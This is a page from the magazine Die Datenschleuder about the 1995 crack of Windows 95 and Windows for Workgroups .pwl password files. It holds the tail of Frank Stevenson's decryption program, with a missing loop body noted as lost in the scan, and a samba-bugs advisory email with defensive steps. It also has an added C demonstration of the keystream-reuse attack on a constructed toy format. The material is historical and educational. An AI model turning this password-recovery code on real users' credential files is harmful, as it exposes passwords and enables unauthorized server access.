Page 14, Issue 54

  cracked=size-0x0208;
  if(cracked<0) cracked=0;
  if(cracked>1000) cracked=1000;
  memcpy(keystream,Data+0x208,cracked);

  /* generate 20 bytes of keystream */
  for(i=0;i<20;i++) {
    ch=toupper(name[i]);
    if(ch==0) break;
    if(ch=='.') break;
    keystream[i]^=ch;
  };
  cracked=20;

  /* find allocated resources */
  sizemask=keystream[0]+(keystream[1]<<8);
  printf("Sizemask: %04X\n",sizemask);

  for(i=0;i<256;i++) Rall[i]=0;
  maxr=0;
  for(i=0x108;i<0x208;i++) {
    if(Data[i]!=0xff) {
      Rall[Data[i]]++;
      if(Data[i]>maxr) maxr=Data[i];
    }
  }
  maxr=(((maxr/16)+1)*16); /* resource pointertable size appears to be divisible by 16 */

  /* search after resources */
  Rpoint[0]=0x0208+2*maxr+20+2; /* first resource */
  for(i=0;i<maxr;i++) {
    /* the body of this loop did not survive the scan; only the tail
       "> 8) & 0x00ff;" of one statement is legible */
  }
  cracked+=maxr*2+2;
  printf("%d bytes of keystream recovered\n",cracked);

  /* decrypt resources */
  for(i=0;i<maxr;i++) {
    rsz=Rpoint[i+1]-Rpoint[i];
    if(rsz>cracked) rsz=cracked;
    printf("Resource[%d] (%d)\n",i,rsz);
    for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);
    printf("\n");
  }
  exit(0);
}

--- end ---

From: samba-bugs@anu.edu.au
Subject: win95 and WfWg .pwl files cracked
Date: Tue, 5 Dec 1995 23:11:52 +1100

I have just tried Frank Stevenson's program for cracking .pwl files. It indeed works. With it I could obtain the plain text passwords from a Windows95 .pwl file or a Windows for Workgroups .pwl file in less than a second. I tried it on 3 different files. All were successfully decrypted. This is very bad.

It means that anyone with access to a WfWg or Win95 box that has been used to login to a samba (or NT or OS/2 etc) server can take the .pwl files off the PC and use them to get valid passwords on the server. Note that this is not directly a security hole in samba. It's a huge security hole in the way WfWg and Win95 store their passwords on disk. It equally affects networks which use NT and OS/2 servers. It also affects people who just use other WfWg and Win95 machines as servers.

Also, if your WfWg and Win95 systems have not been patched to avoid the "cd .." bug and you export any shares then anyone who can attach to those shares can obtain your .pwl files. It doesn't matter what directory you are exporting.

What can you do about this? Well, if you don't care about security then just do nothing :-) Otherwise:

First of all, change your router rules to disable tcp139, udp137 and udp138 from entering your network from the Internet.

Secondly, disable your WfWG and Win95 boxes from saving passwords on disk when connecting to SMB servers. Can someone please post clear instructions on exactly how to do this? (preferably with how to make it permanent)

Thirdly, delete all the .pwl files on your WfWG and Win95 boxes.

There's probably more you should do. I only found out about this decryption program a few minutes ago. I imagine more advice will be forthcoming from other people on this list.

Andrew

Die Datenschleuder - The scientific journal for data travellers.
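The two attack steps in the listing above, worked through on a constructed toy file, as an added example. This is my code, not Frank Stevenson's program and not anything printed on this page, and it does not reproduce the real .pwl layout: the offsets NAME_OFF and REC_OFF, the record structure (a 2-byte length followed by the payload), the RC4 key string, the usernames and the record contents are all assumptions chosen for the demo. What it keeps from the listing is the property being exploited: every record is encrypted with the same stream-cipher keystream restarted at byte 0, the uppercased username is known plaintext at the start of that stream, and the record length field sits under the first two keystream bytes (the listing's sizemask). The listing's further keystream extension from the resource pointer table (its cracked+=maxr*2+2 step) is not reproduced, so here the username length alone bounds how much of each record is recovered.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy container layout (assumed for this demo; NOT the real .pwl layout):
 *   NAME_OFF: uppercased username, XORed with keystream[0..]
 *   REC_OFF : records back to back, each 2-byte LE length + payload,
 *             every record XORed with the keystream restarted at index 0.
 * That restart is the flaw: one known plaintext unmasks a prefix of every record. */
#define NAME_OFF 0x20
#define NAME_MAX 20
#define REC_OFF  0x40
#define NREC     3
#define BUF_SIZE 0x100

/* Constructed record contents (the "secrets" the attack recovers). */
static const char *SECRETS[NREC] = { "SecretPa55word", "Hunter2xx", "q" };

/* RC4 keystream generator. Used only to BUILD the sample; the attack never sees the key. */
static void rc4_keystream(const uint8_t *key, size_t klen, uint8_t *out, size_t n)
{
    uint8_t S[256], t;
    int i, j = 0;
    for (i = 0; i < 256; i++) S[i] = (uint8_t)i;
    for (i = 0; i < 256; i++) {
        j = (j + S[i] + key[i % klen]) & 0xff;
        t = S[i]; S[i] = S[j]; S[j] = t;
    }
    i = j = 0;
    for (size_t k = 0; k < n; k++) {
        i = (i + 1) & 0xff;
        j = (j + S[i]) & 0xff;
        t = S[i]; S[i] = S[j]; S[j] = t;
        out[k] = S[(S[i] + S[j]) & 0xff];
    }
}

/* Build the constructed sample file into buf; returns the number of bytes used. */
size_t build_sample(uint8_t *buf, const char *user)
{
    static const uint8_t key[] = "password-derived-key"; /* assumed secret; unknown to the attacker */
    uint8_t ks[BUF_SIZE];
    size_t i, pos = REC_OFF;
    memset(buf, 0xff, BUF_SIZE);
    rc4_keystream(key, sizeof key - 1, ks, BUF_SIZE);
    for (i = 0; user[i] && i < NAME_MAX; i++)
        buf[NAME_OFF + i] = (uint8_t)toupper((unsigned char)user[i]) ^ ks[i];
    for (int r = 0; r < NREC; r++) {
        size_t len = strlen(SECRETS[r]);
        buf[pos]     = (uint8_t)(len & 0xff) ^ ks[0];  /* length sits under ks[0..1]: */
        buf[pos + 1] = (uint8_t)(len >> 8)   ^ ks[1];  /* the listing's "sizemask"    */
        for (i = 0; i < len; i++)
            buf[pos + 2 + i] = (uint8_t)SECRETS[r][i] ^ ks[2 + i];
        pos += 2 + len;
    }
    return pos;
}

/* Step 1 (the listing's "generate 20 bytes of keystream"): known plaintext.
 * ks[i] = ciphertext[i] XOR uppercase(username[i]). Returns the bytes recovered. */
size_t recover_keystream(const uint8_t *buf, const char *user, uint8_t *ks)
{
    size_t n = 0;
    for (; user[n] && n < NAME_MAX; n++)
        ks[n] = buf[NAME_OFF + n] ^ (uint8_t)toupper((unsigned char)user[n]);
    return n;
}

/* Step 2 (the listing's "decrypt resources"): the same nks keystream bytes decrypt the
 * first nks bytes of EVERY record. ks[0..1] unmasks each length field, which gives the
 * record boundaries; payload bytes beyond the recovered keystream stay unknown. */
int decrypt_records(const uint8_t *buf, size_t size, const uint8_t *ks, size_t nks,
                    char out[][64], int maxrec)
{
    size_t pos = REC_OFF;
    int r = 0;
    if (nks < 2) return 0;                       /* need at least the two length bytes */
    while (r < maxrec && pos + 2 <= size) {
        size_t len = (size_t)(buf[pos] ^ ks[0]) | ((size_t)(buf[pos + 1] ^ ks[1]) << 8);
        size_t n = len < nks - 2 ? len : nks - 2; /* only as far as the keystream is known */
        if (len == 0 || pos + 2 + len > size || n > 63) break;
        for (size_t i = 0; i < n; i++)
            out[r][i] = (char)(buf[pos + 2 + i] ^ ks[2 + i]);
        out[r][n] = '\0';
        pos += 2 + len;
        r++;
    }
    return r;
}

int main(void)
{
    static uint8_t buf[BUF_SIZE];
    uint8_t ks[NAME_MAX];
    char out[NREC][64];
    size_t size = build_sample(buf, "Administrator");
    /* The attacker has only the file and the account name (the listing takes it from the filename). */
    size_t nks = recover_keystream(buf, "administrator", ks);
    printf("%zu bytes of keystream recovered from the username\n", nks);
    int n = decrypt_records(buf, size, ks, nks, out, NREC);
    for (int r = 0; r < n; r++)
        printf("Record[%d]: %s\n", r, out[r]);
    return 0;
}
```

Build with cc -std=c99 and run. The first record comes back only partly, because a 13-character username yields 13 keystream bytes and two of them are spent on the length field; that is exactly why the listing goes on to extend its keystream from other known plaintext before printing the resources. The design lesson is the one the .pwl format got wrong: a stream cipher must never reuse a keystream position across records, and a predictable plaintext at the start of the stream turns that reuse into a direct read of every record's prefix.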